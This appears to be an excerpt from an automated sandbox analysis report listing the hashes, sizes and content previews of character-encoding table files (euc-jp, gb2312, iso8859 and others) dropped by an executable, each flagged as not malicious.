                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):83890
                                                                                                                                                                                                                                            Entropy (8bit):2.350315390677456
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:2GhX8nuQ635vlHptHzh0abNQPQA0OMS2HhFV3:2GikvRpMuNQ4P73
                                                                                                                                                                                                                                            MD5:F2DE0AE66A4E5DD51CC64B08D3709AAB
                                                                                                                                                                                                                                            SHA1:97558A51A6DD6C56FC7A42A4204141A5639021FD
                                                                                                                                                                                                                                            SHA-256:A3C916BA16BCAC9FAA5A1CCC62ACA61452D581CD8BA3EE07EC39122C697274C9
                                                                                                                                                                                                                                            SHA-512:0EAA90100527FF150D2653D7BB57647D69E592BE53B714DDD867114CFCC71E3A76882772F4FAECE040DF09FA8971D1C22DECC497E589B4CA827A6890497A48D9
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-jp, multi-byte..M..003F 0 79..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D0000008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):95451
                                                                                                                                                                                                                                            Entropy (8bit):2.4080588863614136
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:4/vO7UlClqAd8XfpUqv+mCoKRuLbtMjnIxz0DY:4nO4N9fpv+ngLbiyEY
                                                                                                                                                                                                                                            MD5:103843B3A57168BD574F6CACC550D439
                                                                                                                                                                                                                                            SHA1:982652EA2B0DCFBB55970E019A4EDFBFCFAF9C24
                                                                                                                                                                                                                                            SHA-256:5448643398685456A11CBB93AF2321F70B8659E2FFF3CCC534B4D53BD2F38C89
                                                                                                                                                                                                                                            SHA-512:27A8DE6F97DB4A96E5D0132692A32A99DAB8A6C98973A0C4E50A219F2D2F364E63D657E5E8478B2706CA33C45C376F55B5BFCC9459E06AEA88BFCD4F0E32525C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-kr, multi-byte..M..003F 0 90..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):88033
                                                                                                                                                                                                                                            Entropy (8bit):2.3790651802316996
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:o4Is/C+0IwpRK1CkinIKUyNiNBzxOC4T/:LIsR0/RKckiIgNiDtOxT
                                                                                                                                                                                                                                            MD5:1A8E55DEA98B6D5EAC731ED233D3AD7C
                                                                                                                                                                                                                                            SHA1:1335FC0FC2AAE7E7F5EC42AC17A4168368B4A64D
                                                                                                                                                                                                                                            SHA-256:B4894AEDD2D5B5AE54B6D2840F7C89A88E9308EFD288F179E65936E172EF4B0D
                                                                                                                                                                                                                                            SHA-512:9DDCE366BA1196EB9FB913ACFDE8516BC9BB8D51894866D2E7E8CB313DC4D6C6D33C5A9E78142E83594DC423D10DA6F8DE211E69844B939198BC7DB9AED808F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb12345, double-byte..D..233F 0 83..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1111
                                                                                                                                                                                                                                            Entropy (8bit):3.270324851474969
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:qrmHVBUlJvRj76OVbusZhAMiZyi77qN8VmKfkiJt0RMFS:qSMlZVnrAMiwMmNPYPFS
                                                                                                                                                                                                                                            MD5:D06664ACAA478BDEB42B63941109A4E3
                                                                                                                                                                                                                                            SHA1:4A6196FCC1BDE988C1A23EAA69745A9979F1AEFF
                                                                                                                                                                                                                                            SHA-256:ACD50951F81566C8D823670F9957B2479102EB5AE4CF558453E1D8436A9E31FF
                                                                                                                                                                                                                                            SHA-512:CB51A36B851FFDB5C6F9B9D0333EEA6A14CEF3796E0A60530198C16999D64E638047E873333630360299C9126F79CEDDA2D9F169028CED1FC04B1D3C55FFFC5B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb1988, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..002000210022002300A500250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D203E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):85912
                                                                                                                                                                                                                                            Entropy (8bit):2.3945751552930936
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:D47/S+i8vdx3Tz+hpHcBrQqKtrebjMIGCx8jE:0c873T6DHcBrbKtrVlE
                                                                                                                                                                                                                                            MD5:9357E05C74D6A124825F46A42B280C14
                                                                                                                                                                                                                                            SHA1:E5106ABE12D991AFE514F41E3B9E239202A4ADFE
                                                                                                                                                                                                                                            SHA-256:C445E4C9F676AE997D2DDA2BBC107B746F3547D85F39479951C56F46275EE355
                                                                                                                                                                                                                                            SHA-512:B2187D70A92FB38572BA46F3C3443233BEED1A4ABBFBA1B860F4BBAE6B3D8C16B8C9F52A20DAA12B2B8B40972E52F816860427B743530177E4CF0D8BA34EF381
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: gb2312, double-byte..D..233F 0 81..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300230FB02C902C700A8300330052015FF5E2225202620182019..201C201D3014301530083009300A300B300C300D300E300F3016301730103011..00B100D700F72236222722282211220F222A222922082237221A22A522252220..23122299222B222E2261224C2248223D221D2260226E226F22642265221E2235..22342642264000B0203220332103FF0400A4FFE0FFE1203000A7211626062605..25CB25CF25CE25C725C625A125A025B325B2203B219221902191219330130000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):86971
                                                                                                                                                                                                                                            Entropy (8bit):2.3925661740847697
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:UHivP+bFFScXEBFhHeUrUFESCeYjN7GC0nYX:I7FFX2nHeUr8ESCDlX
                                                                                                                                                                                                                                            MD5:C5AA0D11439E0F7682DAE39445F5DAB4
                                                                                                                                                                                                                                            SHA1:73A6D55B894E89A7D4CB1CD3CCFF82665C303D5C
                                                                                                                                                                                                                                            SHA-256:1700AF47DC012A48CEC89CF1DFAE6D1D0D2F40ED731EFF6CA55296A055A11C00
                                                                                                                                                                                                                                            SHA-512:EEE6058BD214C59BCC11E6DE7265DA2721C119CC9261CFD755A98E270FF74D2D73E3E711AA01A0E3414C46D82E291EF0DF2AD6C65CA477C888426D5A1D2A3BC5
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: euc-cn, multi-byte..M..003F 0 82..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000000000000000000000
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):204
                                                                                                                                                                                                                                            Entropy (8bit):4.949409835601965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SOd5MNXVSVLqRIBXS4ovLE9sDXMVyXK9ow1Deq9Ts5dRPMSXcRA0kcR4X9cL+TXI:SVNFS0oyisLMsXK9okTw/BDSVKNw
                                                                                                                                                                                                                                            MD5:D3AC33390D31705FA4486D0B455247DF
                                                                                                                                                                                                                                            SHA1:2EE8613DC04A6FA84AB38FD5F3A2AA3FE330625B
                                                                                                                                                                                                                                            SHA-256:98074C85650A420A095ADA9138DA3A8A0AA4027BE47EA1E97A596F319EB084E9
                                                                                                                                                                                                                                            SHA-512:CB265B753C84968E2D1D6E706906DA9A7BB796D08F626290BCCA8F089771AFD176A9DC912773E8BA390D2AEC08592AD535C7D254E1DF92CF04848601481D4EFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022-jp, escape-driven..E..name..iso2022-jp..init..{}..final..{}..ascii..\x1b(B..jis0201..\x1b(J..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):122
                                                                                                                                                                                                                                            Entropy (8bit):4.978693690727393
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SOd5MNXVTEXIBXS4ovLE9sDXNvdwUHEQwqc6XWxVUNOov:SVNFSoyisL/Zzc6mYNHv
                                                                                                                                                                                                                                            MD5:057CB0AA9872AC3910184F67AC6621BC
                                                                                                                                                                                                                                            SHA1:BBA47F9D76B6690C282724C3423BD94E2C320A04
                                                                                                                                                                                                                                            SHA-256:234811FC8B0F8FF2B847D9CC3982F1699DF1D21A43C74DCE45BA855D22520007
                                                                                                                                                                                                                                            SHA-512:019F187D2D16FB51BF627ACB7E67778857E56D4C160E0E5ACA6ABC05EC5FDB624CE2715CB9E0DAD73BFF9D697982BE0D539BC55BCCD368FC7C8EE0FFC04E9F61
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022-kr, escape-driven..E..name..iso2022-kr..init..\x1b$)C..final..{}..iso8859-1.\x0f..ksc5601..\x0e..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):240
                                                                                                                                                                                                                                            Entropy (8bit):4.95909788984399
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SVNFUXoyisLNcs9ozc6W4Twk0sRBDSVKN6tWIHRy:oUYcLNcTzczbwRYRy
                                                                                                                                                                                                                                            MD5:BB186D4BE3FA67DD3E2DEE82DD8BD628
                                                                                                                                                                                                                                            SHA1:93CE8627038780CFFF8C06E746DD5FB2B041115C
                                                                                                                                                                                                                                            SHA-256:741B4C842557EED2952936204D0AE9C35FA3A0F02F826D94C50C46976291797C
                                                                                                                                                                                                                                            SHA-512:4921E7AA3DB8E33609603FE129B97275DFF80CFB06648D2068FA7950246C67B9B530B74827638F69F4DFB8F55CDD4AA952EA72EAEB6ABB527D52F20C6B46FB51
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso2022, escape-driven..E..name..iso2022..init..{}..final..{}..iso8859-1.\x1b(B..jis0201..\x1b(J..gb1988..\x1b(T..jis0208..\x1b$B..jis0208..\x1b$@..jis0212..\x1b$(D..gb2312..\x1b$A..ksc5601..\x1b$(C..jis0208..\x1b&@\x1b$B..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1114
                                                                                                                                                                                                                                            Entropy (8bit):3.236046263464657
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:iyHVBUlJvRj7SOVbusZhAMiZyi77qimmvGNNlkL+rSMH+tKv:iyMlBVnrAMiwMmTmokLz0
                                                                                                                                                                                                                                            MD5:3538A970CD098BF5CE59005FE87B6626
                                                                                                                                                                                                                                            SHA1:285A96CC40D7CCE104FB4B407C7F0C400AA8F9CB
                                                                                                                                                                                                                                            SHA-256:A9CB4F4CA111608F882729BC5EB1C2F15530C515EF02DD2CA62F2D8DC5A210CF
                                                                                                                                                                                                                                            SHA-512:A6A6F2D8B5C22E240D195D168A604887062508FF3340D24E13BFCBD6C2E687347F2CFE724FA2ED12F36915B55EE2CFD901EC3F08E2B0A2FFD3BC2A98BBD12A50
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-1, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A300A400A500A600A700A800A900AA00AB00AC00AD00AE00AF..00B000B100B200B300B400B500B600B700B800B900BA00BB00BC00BD00BE00BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E300
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.319750415373386
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:jHVBUlJvRj7SOVbusZhAMiZyi77qimXG2yM6q7KytC:jMlBVnrAMiwMmTXG2gytC
                                                                                                                                                                                                                                            MD5:CBDE40170FECD2496A9DA3CF770FAB7B
                                                                                                                                                                                                                                            SHA1:3E1D74DF6AFEB6CDE8ECBDAC8F81F2F9C64150DE
                                                                                                                                                                                                                                            SHA-256:48F4A239C25354F0E9F83A39F15D4632BB18A9C33E60C671C67307159917ECED
                                                                                                                                                                                                                                            SHA-512:A26B56A4CFE29E5A0A0B3A55283A7767397693388E2DEEC342C69B6F718FAE2407EB8D5ADE538FAE6947CBB8B052943C3A52F2D046ABAC7A3DAA86D730DC293F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-10, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0010401120122012A0128013600A7013B011001600166017D00AD016A014A..00B0010501130123012B0129013700B7013C011101610167017E2015016B014B..010000C100C200C300C400C500C6012E010C00C9011800CB011600CD00CE00CF..00D00145014C00D300D400D500D6016800D8017200DA00DB00DC00DD00DE00DF..010100E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3206399689840476
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:6HVBUlJvRj7SOVbusZhAMiZyi77qimwHmEU4AyqU+TWwdd:6MlBVnrAMiwMmTf4AyqUSd
                                                                                                                                                                                                                                            MD5:E2A0BCB83BFC3F435CDCFC20D5CF2E0C
                                                                                                                                                                                                                                            SHA1:CFD18B5B5DB4EE46E63D912B8FD66D513C4C8D39
                                                                                                                                                                                                                                            SHA-256:21E769C5A66E4D12D6E7DB24022E92AF1EC0D0331FE3C8C605654F239C0F3640
                                                                                                                                                                                                                                            SHA-512:C86F9180F2F4A177F1EA10E26B0903ABEAFDDE0317C332A48F8D1BB586DAC91C68800E2E4FA2CD739C435419B106CBA4BEFC049F2BCD720E9FC2C0AE8436CFAC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-11, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3A00000000000000000E3F..0E400E410E420E430
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.338879965076632
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:olHVBUlJvRj7SOVbusZhAMiZyi77qim2w4kBUioGnd2:olMlBVnrAMiwMmT/WNI2
                                                                                                                                                                                                                                            MD5:21CEBB723D47B1450A7FB21A82470B97
                                                                                                                                                                                                                                            SHA1:A40FD3AFE1ECE89E3F682D527D281BC563DB3892
                                                                                                                                                                                                                                            SHA-256:3271D39D7B4DCD841E8E5D5153D1B8837718B88FEFEC73DC37D314816EEFE5E5
                                                                                                                                                                                                                                            SHA-512:3A0E033A4D93C679215F672C6C4FE425D63E1DE157AA671E7400639165EC3EB498E4EEB030D6FB8FF8BE2FD8C986D341036A8CED9FA094D092CF2822D5DC065B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-13, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A0201D00A200A300A4201E00A600A700D800A9015600AB00AC00AD00AE00C6..00B000B100B200B3201C00B500B600B700F800B9015700BB00BC00BD00BE00E6..0104012E0100010600C400C501180112010C00C90179011601220136012A013B..01600143014500D3014C00D500D600D701720141015A016A00DC017B017D00DF..0105012F010101070
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3670559016263915
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:vHVBUlJvRj7SOVbusZhAMiZyi77qimhw6COlk1fKMH+tiH:vMlBVnrAMiwMmT/tlkQz0
                                                                                                                                                                                                                                            MD5:FDAA88946DE4EB4E6D37F2B6AFCF6CAF
                                                                                                                                                                                                                                            SHA1:56FC4773941E7457EA04EDA92C883642DE45D100
                                                                                                                                                                                                                                            SHA-256:F0A5675027FB1CA34B4E4128D24C2968CD275890569A32A86AFA4994CE4983E0
                                                                                                                                                                                                                                            SHA-512:92658A6FEB42A41B3CFFC377C4A9A3F6780A79FC596D3FEDBA6D3B3D75A9F40E859A2CE8DC579A278BAEEDEEFA2408E2B7853D99D5C2D14AACF63C521FE2BB86
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-14, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A01E021E0300A3010A010B1E0A00A71E8000A91E821E0B1EF200AD00AE0178..1E1E1E1F012001211E401E4100B61E561E811E571E831E601EF31E841E851E61..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..017400D100D200D300D400D500D61E6A00D800D900DA00DB00DC00DD017600DF..00E000E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.260398494526282
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:mHVBUlJvRj7SOVbusZhAMiZyi77qimmRf4kL+rSMH+tKv:mMlBVnrAMiwMmTmCkLz0
                                                                                                                                                                                                                                            MD5:D779D5E2A0083C616A226B2D82ABF0EB
                                                                                                                                                                                                                                            SHA1:D1657DB5E2989EBA80BAB98A1E1217CFFFBB19DB
                                                                                                                                                                                                                                            SHA-256:C74E8E23A0FF0D5DEA7C318CA20DC817DA4E57B0DD61B3361FC0D5098A9316FE
                                                                                                                                                                                                                                            SHA-512:26E62BE8AE793ED3B725BF0D1BABF4D6ED63A6F3772ABD48955FC4394BDE5A47614D1FF89A21A828676BF1302F3C9361B557B0FBF0DF8561FB7E66542FE94CDC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# Encoding file: iso8859-15, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080008100820083008400850086008700880089008A008B008C008D008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..00A000A100A200A320AC00A5016000A7016100A900AA00AB00AC00AD00AE00AF..00B000B100B200B3017D00B500B600B7017E00B900BA00BB01520153017800BF..00C000C100C200C300C400C500C600C700C800C900CA00CB00CC00CD00CE00CF..00D000D100D200D300D400D500D600D700D800D900DA00DB00DC00DD00DE00DF..00E000E100E200E30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1115
                                                                                                                                                                                                                                            Entropy (8bit):3.3065938185320918
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:dHVBUlJvRj7SOVbusZhAMiZyi77qim0SmmPkYTtyL:dMlBVnrAMiwMmTttPkYpyL
                                                                                                                                                                                                                                            MD5:74FDEDDAF670023DA7751FB321E345A0
                                                                                                                                                                                                                                            SHA1:0677FED67C1333A9A74D50642E5214701A57E2AF
                                                                                                                                                                                                                                            SHA-256:640D977EC1D22B555C5075798DA009E3523E8F55F29BE22A3050CD1B4EF7B80E
                                                                                                                                                                                                                                            SHA-512:AC02FD95159A856A9DDEF4E6A8216B958DC07311B553FF39403DC5B77E1AFF2A2C4C03F5F26A2BB7AD5DB6800BEE03E895554556DBBFBE89426286796ADE55AC
                                                                                                                                                                                                                                            Malicious:false
